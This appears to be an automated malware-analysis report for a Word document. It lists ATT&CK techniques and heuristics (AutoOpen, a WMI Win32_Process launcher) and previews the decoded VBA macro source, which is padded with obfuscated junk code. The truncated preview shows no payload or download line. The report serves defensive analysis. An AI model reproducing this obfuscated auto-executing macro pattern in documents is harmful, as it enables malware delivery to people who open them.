MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an autoopen subroutine, a common technique for executing malicious code upon document opening. Heuristics indicate the macro attempts to launch a process via WMI, a strong indicator of a downloader or initial execution stage for further malicious activity. The macro's obfuscated nature and lack of clear indicators prevent definitive family attribution.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6943632-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30015 bytes |
SHA-256: 70e8118aeb210c758c1f8a6f4aa0aacac7980b5509b141a57ac6eb3b14b1411c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WDBAAA4"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZDU1Q1"
Attribute VB_Base = "0{ECFEBDF2-A4C9-4A6D-8618-A69D3DB9A0E3}{97EE3BAE-D7DF-4A3C-9624-BDC78D967FBC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "B4AowU"
Attribute VB_Base = "0{6810929F-D14A-4679-84B7-21949FB0FEC1}{3897C71E-CF72-4D7D-86A4-F2E046B6B3E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zUAQ4A"
Sub autoopen()
If ZAkBU44c = qAA_wA Then
Select Case W1ZokAAA
Case 593450686
kZXUA_AA = Rnd(c4ABDAA + 538166895 + 137416323 / RAACw4k)
TxwXxG = CByte(PcAoXX + 892301361 + AQADA_ww + 363093825)
Case 705494804
KBQCUwQD = ixUAkAGA
MD4DCAB = Tan(zAcQ1DAQ - CSng(wDAUADAU))
End Select
End If
If zUAkBo = fBQXAC Then
Select Case rkQQA4oA
Case 185364164
QUcD_B = Rnd(joAQQ_A + 185009137 + 416626336 / jUU4kQXA)
a1CDBk4 = CByte(QDUUcoU4 + 232461170 + W_AAAA4k + 869468825)
Case 329522901
TAkBZA = XBGABA
lUAC1_Cx = Tan(zwQZAAxA - CSng(u1oAQx))
End Select
End If
T4AZAoQw
If BBAG4UwZ = i1AADG_A Then
Select Case zoZADA
Case 509154732
wCAAQA = Rnd(i4AQACAk + 854682617 + 799799859 / LAAZ1AAA)
sowUAx = CByte(Z4ACoAC + 474373553 + oxZAAkoo + 165431398)
Case 306558389
vUAAAB = HAADAZAA
cAAwAw = Tan(XkQAB_C_ - CSng(a4ADAD))
End Select
End If
If HBUQABB = PAAwAAAZ Then
Select Case PADAX_AA
Case 451740081
oGcADA = Rnd(TADxAAA + 105716578 + 768196766 / V4QAQZA)
OAAUQAQ = CByte(QAAAAQ + 483428642 + CAxDxA + 791235694)
Case 959383350
fAAxAZ1x = MUoQBAUA
NBA_xCZA = Tan(fBDQQA - CSng(uwAZCQQA))
End Select
End If
If jBxc1A = pkoBoQo Then
Select Case KcAXAAA1
Case 827255606
DQxGAGx = Rnd(EADA44o + 934896956 + 257997975 / JD_BBkkZ)
k_B4BAkX = CByte(nA_AoA + 406858684 + tkAGAXc + 285010593)
Case 157287028
bZAADBwA = nA_Akx4
hUQCwoGQ = Tan(dACDoUA - CSng(WxGAQckD))
End Select
End If
End Sub
Attribute VB_Name = "iDAABAx"
Function T4AZAoQw()
On Error Resume Next
If fkBZA_Q = R1A_AoB Then
Select Case FD1ZAkB
Case 322947399
rAZZQA = Rnd(qADQBQ + 554331145 + 852442958 / oQDc4x)
MD1AAZU = CByte(kBQXAA + 885726080 + LQQACCZ + 631572621)
Case 547336209
sAZBxDAU = tBxABx
jD_CcQ = Tan(ZADAxCZG - CSng(SCXADXA))
End Select
End If
If QAACQxc = rkBw1BB Then
Select Case nccD1D
Case 663204760
iDAQUBAU = Rnd(sUAQko + 557920055 + 185975153 / LZAA_A)
zCQ1QAA = CByte(CUAAAB + 701394531 + Zwo_AAQc + 615701302)
Case 187010394
PABAAA = fk_GGZ_
QAXcBB = Tan(YwAQAQA - CSng(mDoc_k))
End Select
End If
If 3473 < 74509 Then
UcAAAw = vbFalse
If NxUADAA = kAGDAB4A Then
Select Case CAX1AoD
Case 759028570
tAUXBB = Rnd(EAUCAAc + 377013198 + 855802813 / iAUZQ1)
kGAxcA = CByte(tAZA_ADA + 831988881 + WxADxD + 469273452)
Case 40108950
QAow_AB = VwxXDADX
qAGBXAAD = Tan(iQUAZB - CSng(icZwkAQ))
End Select
End If
If FUBABB = zAQUBAAo Then
Select Case BxkDAUAA
Case 231361184
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.